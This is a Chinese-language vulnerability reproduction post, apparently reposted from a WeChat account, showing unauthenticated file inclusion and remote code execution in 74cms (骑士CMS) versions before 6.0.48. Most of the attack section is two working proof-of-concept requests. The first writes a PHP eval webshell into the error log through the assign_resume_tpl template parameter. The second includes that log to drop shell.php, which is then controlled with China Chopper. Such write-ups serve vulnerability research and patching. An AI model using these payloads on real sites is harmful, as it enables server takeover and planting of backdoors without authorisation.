骑士CMS文件包含+getshell

admin 2020年12月16日03:23:18评论10 views字数 869阅读2分53秒阅读模式

0x00简单介绍

骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统。

0x01漏洞概述

骑士cms官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士cms某些函数过滤不严谨,攻击者通过构造恶意请求可以在无需登录情况下执行代码控制服务器。

0x02影响版本

骑士cms <6.0.48

0x03环境搭建

这里复现使用的是6.0.20(骑士cms不支持php7.0),下载完成后访问安装即可

骑士CMS文件包含+getshell

 

0x04漏洞复现

  1、注入模板

发送poc:
 
http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

骑士CMS文件包含+getshell

 

 

 

 

根据报错查看日志:

路径为WWW74cmsuploaddataRuntimeLogsHome

骑士CMS文件包含+getshell

 

 

   2、文件包含

发送poc:

http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl=data/Runtime/Logs/Home/20_12_15.log(日志文件名为日期)

 

成功写下shell

骑士CMS文件包含+getshell

 

 

菜刀链接

骑士CMS文件包含+getshell

 

 

0x05参考链接

https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg

https://blog.csdn.net/weixin_44508748/article/details/111187529

 

0x06 文章来源

https://www.cnblogs.com/twlr/p/14142870.html

原文始发于微信公众号(White OWL):骑士CMS文件包含+getshell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月16日03:23:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   骑士CMS文件包含+getshellhttps://cn-sec.com/archives/2490819.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息